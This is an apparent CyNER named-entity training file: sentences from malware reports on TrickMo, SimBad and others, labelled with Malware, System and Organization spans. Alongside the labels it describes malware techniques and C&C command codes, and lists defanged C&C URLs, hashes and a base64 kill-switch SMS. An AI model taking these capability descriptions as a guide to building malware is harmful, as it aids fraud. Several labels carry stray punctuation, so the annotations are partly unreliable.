{"text": "Keep in mind that while this case is about TANs , it can be any OTP , depending on which bank is being targeted .", "spans": {}, "info": {"id": "cyner_valid_000695", "source": "cyner_valid"}}
{"text": "In some cases , sophisticated web injects were used to trick victims into entering their 2FA codes directly into the web forms controlled by the malware to eliminate the need for the mobile malware component .", "spans": {}, "info": {"id": "cyner_valid_000697", "source": "cyner_valid"}}
{"text": "But attackers were still constantly looking for new methods to steal TANs .", "spans": {}, "info": {"id": "cyner_valid_000698", "source": "cyner_valid"}}
{"text": "Around 2011 , the infamous Zeus Trojan started using web injects that tricked users into downloading a mobile component called “ ZitMo ” ( Zeus in the Mobile ) .", "spans": {"Malware: Zeus Trojan": [[27, 38]], "Malware: ZitMo": [[129, 134]], "Malware: Zeus": [[139, 143]]}, "info": {"id": "cyner_valid_000699", "source": "cyner_valid"}}
{"text": "This was used to bypass 2FA methods by intercepting the SMS messages coming from the bank and stealing the mTANs without the victim ’ s knowledge .", "spans": {}, "info": {"id": "cyner_valid_000700", "source": "cyner_valid"}}
{"text": "Many other banking malware families followed suit and released their own Android malware components designed to steal those OTPs and TANs .", "spans": {}, "info": {"id": "cyner_valid_000701", "source": "cyner_valid"}}
{"text": "Instead of relying on SMS messages , which can be easily intercepted by third-party apps , these applications started using push notifications for users , containing the transaction details and the TAN .", "spans": {}, "info": {"id": "cyner_valid_000703", "source": "cyner_valid"}}
{"text": "The pushTAN method has a clear advantage : It improves security by mitigating the risk of SIM swapping attacks and SMS stealers .", "spans": {}, "info": {"id": "cyner_valid_000704", "source": "cyner_valid"}}
{"text": "TrickMo Calls pushTAN The pushTAN method is a hurdle for malware apps that may reside on the same device , and it ’ s particularly challenging for mobile malware due to Android ’ s application sandbox .", "spans": {"Malware: TrickMo": [[0, 7]], "System: Android": [[169, 176]]}, "info": {"id": "cyner_valid_000705", "source": "cyner_valid"}}
{"text": "This feature is designed to block one application from accessing the data of other applications without rooting the device .", "spans": {}, "info": {"id": "cyner_valid_000706", "source": "cyner_valid"}}
{"text": "To get around this challenge , TrickMo ’ s developers added some new features to steal TANs using screen video recording and screen data scraping .", "spans": {"Malware: TrickMo": [[31, 38]]}, "info": {"id": "cyner_valid_000707", "source": "cyner_valid"}}
{"text": "The Root of All ( Android ) Evil So how does TrickMo get around these security features ?", "spans": {"System: Android": [[18, 25]], "Malware: TrickMo": [[45, 52]]}, "info": {"id": "cyner_valid_000708", "source": "cyner_valid"}}
{"text": "It abuses accessibility services .", "spans": {}, "info": {"id": "cyner_valid_000709", "source": "cyner_valid"}}
{"text": "Any app can ask for accessibility permissions and implement features such as screen reading , changing sizes and colors of objects , hearing enhancements , replacing touch with other forms of control and more .", "spans": {}, "info": {"id": "cyner_valid_000711", "source": "cyner_valid"}}
{"text": "In recent years , some malicious Android applications abused these accessibility services in various attack scenarios .", "spans": {"System: Android": [[33, 40]]}, "info": {"id": "cyner_valid_000712", "source": "cyner_valid"}}
{"text": "In the image below , we see the malware function that detects such dialogs when they are presented to the user , asking them to tap an option based on predefined choices .", "spans": {}, "info": {"id": "cyner_valid_000716", "source": "cyner_valid"}}
{"text": "TrickMo ’ s Persistence Capabilities When it comes to Android-based devices , many applications must find a way to run on the device after a system reboot .", "spans": {"Malware: TrickMo": [[0, 7]], "System: Android-based": [[54, 67]]}, "info": {"id": "cyner_valid_000717", "source": "cyner_valid"}}
{"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the “ android.intent.action.BOOT_COMPLETED ” broadcast action and adding code that boots the application when the broadcast is fired .", "spans": {}, "info": {"id": "cyner_valid_000718", "source": "cyner_valid"}}
{"text": "Instead of running its service only at boot time , it registers a receiver that listens to the “ android.intent.action.SCREEN_ON ” and “ android.provider.Telephony.SMS_DELIVER ” broadcast actions .", "spans": {}, "info": {"id": "cyner_valid_000721", "source": "cyner_valid"}}
{"text": "It then uses the AlarmManager to set a pending intent that will run its own service after a predefined interval .", "spans": {"System: AlarmManager": [[17, 29]]}, "info": {"id": "cyner_valid_000722", "source": "cyner_valid"}}
{"text": "Tricky Configurations TrickMo uses the shared preferences mechanism to store settings and data that the malware uses at runtime .", "spans": {"Malware: TrickMo": [[22, 29]]}, "info": {"id": "cyner_valid_000724", "source": "cyner_valid"}}
{"text": "Some of the settings are Boolean values that act as switches .", "spans": {}, "info": {"id": "cyner_valid_000725", "source": "cyner_valid"}}
{"text": "They represent features and can be turned on and off from the command-and-control ( C & C ) server or by an SMS message , effectively instructing the malware to execute certain tasks .", "spans": {}, "info": {"id": "cyner_valid_000726", "source": "cyner_valid"}}
{"text": "Some of the settings include : The URL of the C & C server Service wake-up intervals Important package names Accessibility permissions status Lockdown screen status Recording status SMS app status Kill switch status Stealth To keep its resources safer and make analysis more difficult for researchers , TrickMo uses an obfuscator to scramble the names of its functions , classes and variables .", "spans": {"Malware: TrickMo": [[303, 310]]}, "info": {"id": "cyner_valid_000727", "source": "cyner_valid"}}
{"text": "As an example , in the two images below , we can see the encrypted and decrypted shared preferences file , which is encrypted using the java “ PBEWithMD5AndDES ” algorithm .", "spans": {}, "info": {"id": "cyner_valid_000729", "source": "cyner_valid"}}
{"text": "C & C Communications Exfiltrating Device Data To communicate with its master , TrickMo ’ s code contains a hardcoded URL of the C & C server .", "spans": {"Malware: TrickMo": [[79, 86]]}, "info": {"id": "cyner_valid_000730", "source": "cyner_valid"}}
{"text": "When it runs , it periodically connects to its designated server via an unencrypted HTTP request and sends over a JSON object that contains data gleaned from the victim ’ s phone .", "spans": {}, "info": {"id": "cyner_valid_000731", "source": "cyner_valid"}}
{"text": "The stolen parameters follow : ID IMSI IMEI Phone number Operator AID Model Brand Version Build Battery percentage Wi-Fi connection state Wake time Are logs enabled ?", "spans": {}, "info": {"id": "cyner_valid_000732", "source": "cyner_valid"}}
{"text": "Is the malware already set as the default SMS application ?", "spans": {}, "info": {"id": "cyner_valid_000733", "source": "cyner_valid"}}
{"text": "[ True/False ] Signal strength Screen active [ True/False ] Orientation Was accessibility permission granted ?", "spans": {}, "info": {"id": "cyner_valid_000734", "source": "cyner_valid"}}
{"text": "[ True/False ] Screen size List of the installed applications SMS messages saved on the device It is not uncommon for banking malware to harvest extensive amounts of data from the victim ’ s device .", "spans": {}, "info": {"id": "cyner_valid_000735", "source": "cyner_valid"}}
{"text": "The collected data can then be used to generate a unique identifier of the bot or for monetization purposes .", "spans": {}, "info": {"id": "cyner_valid_000736", "source": "cyner_valid"}}
{"text": "For example , since some banks use anti-fraud solutions that only check device fingerprinting , fraudsters can use the collected information to perform fraudulent transactions from a device that mimics that same fingerprint .", "spans": {}, "info": {"id": "cyner_valid_000738", "source": "cyner_valid"}}
{"text": "Once in a while , it sends a packet to its C & C server containing the collected device data along with all the saved SMS messages .", "spans": {}, "info": {"id": "cyner_valid_000740", "source": "cyner_valid"}}
{"text": "Since it can use the accessibility service to become the default SMS app , it can also delete the SMS messages so only the attackers can see them .", "spans": {}, "info": {"id": "cyner_valid_000741", "source": "cyner_valid"}}
{"text": "A Communication Channel via Stolen SMS In addition , TrickMo has an automatic mechanism to send SMS messages to its C & C server .", "spans": {"Malware: TrickMo": [[53, 60]]}, "info": {"id": "cyner_valid_000743", "source": "cyner_valid"}}
{"text": "It can save an SMS message on the device , marking with “ internal ” in the phone number field .", "spans": {}, "info": {"id": "cyner_valid_000745", "source": "cyner_valid"}}
{"text": "The SMS message will be instantly sent to the server , informing the malware operator of executed tasks .", "spans": {}, "info": {"id": "cyner_valid_000746", "source": "cyner_valid"}}
{"text": "In the image below , we see a log TrickMo sent to the attacker upon becoming the default SMS app .", "spans": {"Malware: TrickMo": [[34, 41]]}, "info": {"id": "cyner_valid_000747", "source": "cyner_valid"}}
{"text": "If the malware successfully became the default SMS app , it sends the words “ the app has been replaced ” in Russian .", "spans": {}, "info": {"id": "cyner_valid_000748", "source": "cyner_valid"}}
{"text": "If the original SMS app has been restored , it will send “ the app returned to its original place. ” Controlling TrickMo TrickMo ’ s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware ’ s configuration and make it execute certain tasks .", "spans": {"Malware: TrickMo": [[113, 120], [121, 128]]}, "info": {"id": "cyner_valid_000749", "source": "cyner_valid"}}
{"text": "Some of the more interesting commands include : SMS Control Update the address of the C & C server — SMS starting with “ http : // ” Send AES-encrypted SMS message back to sender — SMS starting with “ sms : // ” Update service wake-up interval — “ 2 ” Kill switch — “ 4 ” C & C Control Update the address of the C & C server — “ 1 ” Update service wake-up interval — “ 2 ” Lock the screen — “ 5 ” Display a picture in a WebView from an arbitrary URL — “ 11 ” Send an arbitrary SMS message — “ 8 ” Steal images", "spans": {}, "info": {"id": "cyner_valid_000750", "source": "cyner_valid"}}
{"text": "saved on the device — “ 12 ” and “ 13 ” Use the accessibility service to become the default SMS app — “ 6 ” Enable recording of other apps — “ 15 ” Kill switch — “ 4 ” The Lockdown Screen Most thieves don ’ t want to be caught red-handed as they steal — they want to buy some time to get away with the loot .", "spans": {}, "info": {"id": "cyner_valid_000751", "source": "cyner_valid"}}
{"text": "The same is true for banking malware .", "spans": {}, "info": {"id": "cyner_valid_000752", "source": "cyner_valid"}}
{"text": "Desktop banking malware often blocks the user ’ s access to their banking website after a successful transaction by using web injects that show a variety of “ service unavailable ” screens .", "spans": {}, "info": {"id": "cyner_valid_000753", "source": "cyner_valid"}}
{"text": "TrickMo is no different ; the goal is to complete the operation while raising minimal suspicion .", "spans": {"Malware: TrickMo": [[0, 7]]}, "info": {"id": "cyner_valid_000754", "source": "cyner_valid"}}
{"text": "This background image likely contains a fake “ software update ” screen .", "spans": {}, "info": {"id": "cyner_valid_000757", "source": "cyner_valid"}}
{"text": "This screen persists on the screen and prevents the user from using the navigation buttons .", "spans": {}, "info": {"id": "cyner_valid_000759", "source": "cyner_valid"}}
{"text": "Due to TrickMo ’ s persistence implementation mentioned earlier , this lockdown screen persists after a restart and is re-initiated every time the device becomes interactive .", "spans": {"Malware: TrickMo": [[7, 14]]}, "info": {"id": "cyner_valid_000760", "source": "cyner_valid"}}
{"text": "In some cases , TrickMo may use this feature to intercept SMS messages without the knowledge of the user by activating the lockdown screen and intercepting SMS messages in the background .", "spans": {"Malware: TrickMo": [[16, 23]]}, "info": {"id": "cyner_valid_000761", "source": "cyner_valid"}}
{"text": "Application Recording — Stealing OTPs and TANs The feature that makes TrickMo different from standard SMS stealers is its unique ability to record the screen when targeted apps are running .", "spans": {"Malware: TrickMo": [[70, 77]]}, "info": {"id": "cyner_valid_000762", "source": "cyner_valid"}}
{"text": "This feature was enabled only in newer versions of TrickMo that were tailored specifically for German banks and use a special application for implementing TAN-based 2FA .", "spans": {"Malware: TrickMo": [[51, 58]]}, "info": {"id": "cyner_valid_000763", "source": "cyner_valid"}}
{"text": "The application recording is implemented via two methods : Using the Android MediaRecorder class to capture a video of the screen when the targeted application is presented to the user Using the accessibility service to save a text file containing the data of all the objects on the screen Both files are later sent to the C & C server of the attacker .", "spans": {"System: Android": [[69, 76]]}, "info": {"id": "cyner_valid_000764", "source": "cyner_valid"}}
{"text": "In the following image , we can see how the malware receives a JSON object from the C & C server containing the command to start recording , the targeted apps and the recorded video size ratio .", "spans": {}, "info": {"id": "cyner_valid_000765", "source": "cyner_valid"}}
{"text": "In the image below , the function recursively collects all the text data from the child nodes of each accessibility node .", "spans": {}, "info": {"id": "cyner_valid_000766", "source": "cyner_valid"}}
{"text": "In other words , it goes through every object on the screen and saves its text data .", "spans": {}, "info": {"id": "cyner_valid_000767", "source": "cyner_valid"}}
{"text": "A TrickMo Kill Switch One of the most interesting features of the TrickMo malware is having its own kill switch .", "spans": {"Malware: TrickMo": [[2, 9]], "Malware: TrickMo malware": [[66, 81]]}, "info": {"id": "cyner_valid_000768", "source": "cyner_valid"}}
{"text": "Kill switches are used by many malware authors to remove traces from a device after a successful operation .", "spans": {}, "info": {"id": "cyner_valid_000769", "source": "cyner_valid"}}
{"text": "In the following image , we can see the function that parses the commands from the C & C server .", "spans": {}, "info": {"id": "cyner_valid_000771", "source": "cyner_valid"}}
{"text": "If the returned JSON object has the “ 4 ” key , it will turn on the kill switch and initiate its own removal by sending an intent and seamlessly confirming the uninstall using the accessibility service , all without the victim ever noticing anything .", "spans": {}, "info": {"id": "cyner_valid_000772", "source": "cyner_valid"}}
{"text": "The kill switch can also be turned on by SMS .", "spans": {}, "info": {"id": "cyner_valid_000773", "source": "cyner_valid"}}
{"text": "This is a bit more complicated since the SMS commands are encrypted and encoded with base64 .", "spans": {}, "info": {"id": "cyner_valid_000774", "source": "cyner_valid"}}
{"text": "The encryption algorithm used is RSA , and interestingly , the authors chose to use the private key for decryption and leave it in the code as a hardcoded string .", "spans": {}, "info": {"id": "cyner_valid_000775", "source": "cyner_valid"}}
{"text": "The image below shows the function that parses the SMS messages , decrypts them using the hardcoded RSA private key and executes the commands .", "spans": {}, "info": {"id": "cyner_valid_000776", "source": "cyner_valid"}}
{"text": "Having analyzed a few variants of the malware , we noticed that the private key was exposed in the code and did not change .", "spans": {}, "info": {"id": "cyner_valid_000777", "source": "cyner_valid"}}
{"text": "Therefore , our team managed to generate the public key and craft an SMS message that activated the kill switch .", "spans": {}, "info": {"id": "cyner_valid_000778", "source": "cyner_valid"}}
{"text": "This means that the malware can be remotely eliminated by an SMS message .", "spans": {}, "info": {"id": "cyner_valid_000779", "source": "cyner_valid"}}
{"text": "Our team was also able to test other commands in the lab either by tampering with the HTTP traffic from the C & C or by sending crafted SMS messages .", "spans": {}, "info": {"id": "cyner_valid_000780", "source": "cyner_valid"}}
{"text": "Suspect You ’ re Infected ?", "spans": {}, "info": {"id": "cyner_valid_000781", "source": "cyner_valid"}}
{"text": "The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo ’ s kill switch by sending the string “ 4 ” encrypted with the generated RSA public key and base64", "spans": {"Malware: TrickMo": [[257, 264]]}, "info": {"id": "cyner_valid_000782", "source": "cyner_valid"}}
{"text": "Indicators of Compromise ( IoCs ) hxxp : //mcsoft365.com/c hxxp : //pingconnect.net/c Hashes MD5 : 5c749c9fce8c41bf6bcc9bd8a691621b SHA256 : 284bd2d16092b4d13b6bc85d87950eb4c5e8cbba9af2a04d76d88da2f26c485c MD5 : b264af5d2f3390e465052ab502b0726d", "spans": {}, "info": {"id": "cyner_valid_000784", "source": "cyner_valid"}}
{"text": "SHA256 : 8ab1712ce9ca2d7952ab763d8a4872aa6a278c3f60dc13e0aebe59f50e6e30f6 The TrickMo Factor The TrickBot Trojan was one of the most active banking malware strains in the cybercrime arena in 2019 .", "spans": {"Malware: TrickMo": [[78, 85]], "Malware: TrickBot Trojan": [[97, 112]]}, "info": {"id": "cyner_valid_000785", "source": "cyner_valid"}}
{"text": "From our analysis , it is apparent that TrickMo is designed to help TrickBot break the most recent methods of TAN-based authentication .", "spans": {"Malware: TrickMo": [[40, 47]], "Malware: TrickBot": [[68, 76]]}, "info": {"id": "cyner_valid_000786", "source": "cyner_valid"}}
{"text": "One of the most significant features TrickMo possesses is the app recording feature , which is what gives TrickBot the ability to overcome the newer pushTAN app validations deployed by banks .", "spans": {"Malware: TrickMo": [[37, 44]], "Malware: TrickBot": [[106, 114]]}, "info": {"id": "cyner_valid_000787", "source": "cyner_valid"}}
{"text": "SimBad : A Rogue Adware Campaign On Google Play March 13 , 2019 Check Point researchers from the Mobile Threat Team have discovered a new adware campaign on the Google Play Store .", "spans": {"Malware: SimBad": [[0, 6]], "System: Google Play": [[36, 47]], "Organization: Check Point": [[64, 75]], "System: Google Play Store": [[161, 178]]}, "info": {"id": "cyner_valid_000788", "source": "cyner_valid"}}
{"text": "This particular strain of Adware was found in 206 applications , and the combined download count has reached almost 150 million .", "spans": {}, "info": {"id": "cyner_valid_000789", "source": "cyner_valid"}}
{"text": "Google was swiftly notified and removed the infected applications from the Google Play Store .", "spans": {"Organization: Google": [[0, 6]], "System: Google Play": [[75, 86]]}, "info": {"id": "cyner_valid_000790", "source": "cyner_valid"}}
{"text": "Inside the SDK The malware resides within the ‘ RXDrioder ’ Software Development Kit ( SDK ) , which is provided by ‘ addroider [ .", "spans": {}, "info": {"id": "cyner_valid_000791", "source": "cyner_valid"}}
{"text": "] com ’ as an ad-related SDK .", "spans": {}, "info": {"id": "cyner_valid_000792", "source": "cyner_valid"}}
{"text": "We believe the developers were scammed to use this malicious SDK , unaware of its content , leading to the fact that this campaign was not targeting a specific county or developed by the same developer .", "spans": {}, "info": {"id": "cyner_valid_000793", "source": "cyner_valid"}}
{"text": "The malware has been dubbed ‘ SimBad ’ due to the fact that a large portion of the infected applications are simulator games .", "spans": {"Malware: SimBad": [[30, 36]]}, "info": {"id": "cyner_valid_000794", "source": "cyner_valid"}}
{"text": "After installation , the malware connects to the designated Command and Control ( C & C ) server , and receives a command to perform .", "spans": {}, "info": {"id": "cyner_valid_000796", "source": "cyner_valid"}}
{"text": "‘ SimBad ’ comes with a respected list of capabilities on the user ’ s device , such as removing the icon from the launcher , thus making it harder for the user to uninstall , start to display background ads and open a browser with a given URL .", "spans": {"Malware: SimBad": [[2, 8]]}, "info": {"id": "cyner_valid_000797", "source": "cyner_valid"}}
{"text": "What Does SimBad Do ?", "spans": {"Malware: SimBad": [[10, 16]]}, "info": {"id": "cyner_valid_000798", "source": "cyner_valid"}}
{"text": "‘ SimBad ’ has capabilities that can be divided into three groups – Show Ads , Phishing , and Exposure to other applications .", "spans": {"Malware: SimBad": [[2, 8]]}, "info": {"id": "cyner_valid_000799", "source": "cyner_valid"}}
{"text": "With the capability to open a given URL in a browser , the actor behind ‘ SimBad ’ can generate phishing pages for multiple platforms and open them in a browser , thus performing spear-phishing attacks on the user .", "spans": {"Malware: SimBad": [[74, 80]]}, "info": {"id": "cyner_valid_000800", "source": "cyner_valid"}}
{"text": "With the capability to open market applications , such as Google Play and 9Apps , with a specific keyword search or even a single application ’ s page , the actor can gain exposure for other threat actors and increase his profits .", "spans": {"System: Google Play": [[58, 69]], "System: 9Apps": [[74, 79]]}, "info": {"id": "cyner_valid_000801", "source": "cyner_valid"}}
{"text": "The actor can even take his malicious activities to the next level by installing a remote application from a designated server , thus allowing him to install new malware once it is required .", "spans": {}, "info": {"id": "cyner_valid_000802", "source": "cyner_valid"}}
{"text": "The C & C server observed in this campaign is ‘ www [ .", "spans": {}, "info": {"id": "cyner_valid_000803", "source": "cyner_valid"}}
{"text": "This server runs an instance of ‘ Parse Server ’ ( source on GitHub ) , an open source version of the Parse Backend infrastructure , which is a model for providing web app and mobile app developers with a way to link their applications to backend cloud storage and APIs exposed by back-end applications , while also providing features such as user management , push notifications and more .", "spans": {"Organization: GitHub": [[61, 67]]}, "info": {"id": "cyner_valid_000805", "source": "cyner_valid"}}
{"text": "The domain ‘ addroider [ .", "spans": {}, "info": {"id": "cyner_valid_000806", "source": "cyner_valid"}}
{"text": "] com ’ was registered via GoDaddy , and uses privacy protection service .", "spans": {"Organization: GoDaddy": [[27, 34]]}, "info": {"id": "cyner_valid_000807", "source": "cyner_valid"}}
{"text": "While accessing the domain from a browser you get a login page very similar to other malware panels .", "spans": {}, "info": {"id": "cyner_valid_000808", "source": "cyner_valid"}}
{"text": "The ‘ Register ’ and ‘ Sign Up ’ links are broken and ‘ redirects ’ the user back to the login page .", "spans": {}, "info": {"id": "cyner_valid_000809", "source": "cyner_valid"}}
{"text": "According to RiskIQ ’ s PassiveTotal , the domain expired 7 months ago .", "spans": {"System: RiskIQ": [[13, 19]]}, "info": {"id": "cyner_valid_000810", "source": "cyner_valid"}}
{"text": "As a result , it may be that are looking into a compromised , parked domain that was initially used legitimately , but is now participating in malicious activities .", "spans": {}, "info": {"id": "cyner_valid_000811", "source": "cyner_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom.Locky.B Backdoor.Win32.Androm.ovjw Win32.Trojan.Dropper.Llhl Trojan.Tinba.Win32.4930 W32/Trojan.BWXR-8654 Trojan.Heur.GZ.ED1EB9A Trojan.Win32.Z.Tinba.58088 Backdoor.Win32.Androm.ovjw TrojanDownloader:Win32/Injranluder.A Win32/Tinba.CH Trojan.Win32.Tinba W32/Tinba.CH!tr Heur.Trojan.Hlux Trj/CI.A Win32/Trojan.Dropper.b73", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000001", "source": "cyner2_valid"}}
{"text": "The Hancitor downloader has been relatively quiet since a major campaign back in June 2016.", "spans": {"Malware: The Hancitor downloader": [[0, 23]]}, "info": {"id": "cyner2_valid_000002", "source": "cyner2_valid"}}
{"text": "PyCL/Fatboy ransomware indicators", "spans": {"Malware: PyCL/Fatboy ransomware": [[0, 22]]}, "info": {"id": "cyner2_valid_000003", "source": "cyner2_valid"}}
{"text": "However, it has some other features that make it interesting.", "spans": {}, "info": {"id": "cyner2_valid_000004", "source": "cyner2_valid"}}
{"text": "ClearSky conducts consistent monitoring of various Darknet actors and communities, including specific actors that develop and sell malware, exploits, bots and ransomware.", "spans": {"Organization: ClearSky": [[0, 8]], "Malware: malware, exploits, bots": [[131, 154]], "Malware: ransomware.": [[159, 170]]}, "info": {"id": "cyner2_valid_000005", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.D1AE Win32.Worm.Harwig.D Worm/W32.Harwig.28672.B Worm.Harwig Win32.Worm.Harwig.D W32/Harwig.d Win32.Worm.Harwig.D Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Harwig.CCJK-3764 W32.Harwig Win.Trojan.Packed-85 Win32.Worm.Harwig.D IM-Worm.Win32.Harwig.d Win32.Worm.Harwig.D Trojan.Win32.Harwig.glxk Win32.Worm-im.Harwig.Ajlc Win32.Worm.Harwig.D TrojWare.Win32.PkdMorphine.~AN Win32.Worm.Harwig.D BackDoor.Oscar Worm.Harwig.Win32.4 BehavesLike.Win32.Pate.mc Worm.Win32.Harwig W32/Harwig.F Packed.Morphine.a Worm:Win32/Harwig.K Worm[IM]/Win32.Harwig Worm:Win32/Harwig.K W32.W.Harwig.d!c Trojan/Win32.Sdbot.C880385 IMWorm.Harwig W32/Harwig.G.worm W32/Harwig.BA!worm.im", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000006", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: OLE.Downloader.2522 TROJ_PHISHERLY.ZQEJ-A Doc.Tool.Phishery-6331699-0 W97M.DownLoader.1853 TROJ_PHISHERLY.ZQEJ-A ZIP/Trojan.DPBG-0 Trojan:O97M/Nocgrey.A Risk.Office.RemoteTemplate.a virus.office.script.4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000007", "source": "cyner2_valid"}}
{"text": "We assess APT33 works at the behest of the Iranian government.", "spans": {"Organization: the Iranian government.": [[39, 62]]}, "info": {"id": "cyner2_valid_000008", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Android.Trojan.Geinimi.B AndroidOS/Geimini.B Android.F369B946 HEUR:Trojan.AndroidOS.Meds.a A.H.Pay.Geimini.A Trojan:Android/MalCrypt.A Android.F369B946 AndroidOS/Geimini.B Android.Trojan.Geinimi.B Android-Trojan/Geimini.1bbc HEUR:Trojan.AndroidOS.Meds.a Trojan.AndroidOS.Geinimi Android.Trojan.Geinimi.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000009", "source": "cyner2_valid"}}
{"text": "While the use of document-based macros for ransomware distribution remains relatively uncommon, a new family calling itself Locky has borrowed the technique from the eminently successful Dridex to maximize its target base.", "spans": {"Malware: document-based macros": [[17, 38]], "Malware: ransomware": [[43, 53]], "Malware: Locky": [[124, 129]], "Malware: Dridex": [[187, 193]]}, "info": {"id": "cyner2_valid_000010", "source": "cyner2_valid"}}
{"text": "Recently, Bleeping Computer published a short article about an unrecognized Trojan that grabs documents from the attacked computer and uploads them into a malicious server.", "spans": {"Organization: Bleeping Computer": [[10, 27]], "Malware: Trojan": [[76, 82]], "System: attacked computer": [[113, 130]], "System: malicious server.": [[155, 172]]}, "info": {"id": "cyner2_valid_000012", "source": "cyner2_valid"}}
{"text": "In June 2013, McAfee published a report detailing the chronology and variance of the Dark Seoul campaign, but renamed it Operation Troy'.", "spans": {"Organization: McAfee": [[14, 20]]}, "info": {"id": "cyner2_valid_000013", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: BKDR_THOPER.SM Win32.Trojan.Korplug.b BKDR_THOPER.SM Trojan.Spambot.10006 TrojanDownloader:Win32/Thoper.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000015", "source": "cyner2_valid"}}
{"text": "We came across the names Photo , Message , Avito Offer , and MMS Message .", "spans": {}, "info": {"id": "cyner2_valid_000016", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm.Autoit.Jenxcus.A Spyware.PasswordStealer.AI TROJ_OTOTI.SMVC W32/Trojan2.OORD TROJ_OTOTI.SMVC BehavesLike.Win32.BadFile.bh W32/Trojan.GDZY-5497 Trojan/MSIL.dcuj Trojan.Heur.AutoIT.10 Trojan:Win32/Trept.A Trojan/Win32.Autoit.C262399 Trojan.Autoit.Wirus Win32/Autoit.IV Trojan.Win32.Jorik W32/Inject.EYEW!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000017", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.7AA7 Trojan.Win32.Black.exryej BehavesLike.Win32.Dropper.tc Trojan.Win32.VMProtect TrojanDropper:Win32/Woozlist.B TrojanDropper.Woozlist Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000018", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TSPY_EMOTET.SML3 TSPY_EMOTET.SML3 Trojan.Win32.Inject.aidsh Trojan.Win32.Spora.eqxhdc TrojWare.Win32.Yakes.FULW Trojan.PWS.Steam.2255 BehavesLike.Win32.SoftPulse.gc W32/Trojan.SQOB-8242 Trojan.Deshacop.wg Trojan.Win32.Inject.aidsh Win32/Trojan.e36", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000019", "source": "cyner2_valid"}}
{"text": "Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities.", "spans": {"Vulnerability: zero-days": [[72, 81]], "Organization: European diplomatic": [[90, 109]], "Organization: military entities.": [[114, 132]]}, "info": {"id": "cyner2_valid_000020", "source": "cyner2_valid"}}
{"text": "Various recruitment posts on Chinese job sites and Chinese National Enterprise Credit Information Public System ( NECIPS ) data led us one step further , linking the actor to its legal entity name .", "spans": {"System: Chinese National Enterprise Credit Information Public System ( NECIPS )": [[51, 122]]}, "info": {"id": "cyner2_valid_000021", "source": "cyner2_valid"}}
{"text": "These apps would remain available on the Play Store for months and would eventually be re-uploaded .", "spans": {"System: Play Store": [[41, 51]]}, "info": {"id": "cyner2_valid_000022", "source": "cyner2_valid"}}
{"text": "In contrast to PlugX and PIVY, which are used by multiple campaigns, ChChes appears to be unique to this group.", "spans": {"Malware: PlugX": [[15, 20]], "Malware: PIVY,": [[25, 30]]}, "info": {"id": "cyner2_valid_000023", "source": "cyner2_valid"}}
{"text": "icons Figure 11 : Icons used to pose as famous apps .", "spans": {}, "info": {"id": "cyner2_valid_000024", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass Trojan.Win32.Katusha.twgxn Trojan.DownLoader6.62288 BehavesLike.Win32.Pate.ch Packed.Katusha.arhh W32/Katusha.O Trojan.Heur2.FU.E045CE TrojanDropper:Win32/Penco.A Trojan/Win32.Penco.C241224 Win32/Trojan.a86", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000025", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.CrypticB.Trojan Virus.Win32.Virut.1!O W32.Virut.Cur1 Worm.Allaple.Win32.1 WORM_ALLAPLE.IK W32.Rahack.H WORM_ALLAPLE.IK Win.Worm.Allaple-311 Net-Worm.Win32.Allaple.e Virus.Win32.Allaple.bkbmt Worm.Win32.Allaple.e Trojan.Starman.6712 BehavesLike.Win32.RAHack.cc WORM/Allaple.gcuzf Virus/Win32.Virut.ce Worm.AllApleT.cz.67868 W32.W.Allaple.liao Net-Worm.Win32.Allaple.e OScope.Malware-Cryptor.Win32.Allaple I-Worm.Allaple Win32/Virut.NBP Net-Worm.Win32.Allaple.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000026", "source": "cyner2_valid"}}
{"text": "The DroidJack RAT has been described in the past, including by Symantec and Kaspersky", "spans": {"Malware: The DroidJack RAT": [[0, 17]], "Organization: Symantec": [[63, 71]], "Organization: Kaspersky": [[76, 85]]}, "info": {"id": "cyner2_valid_000027", "source": "cyner2_valid"}}
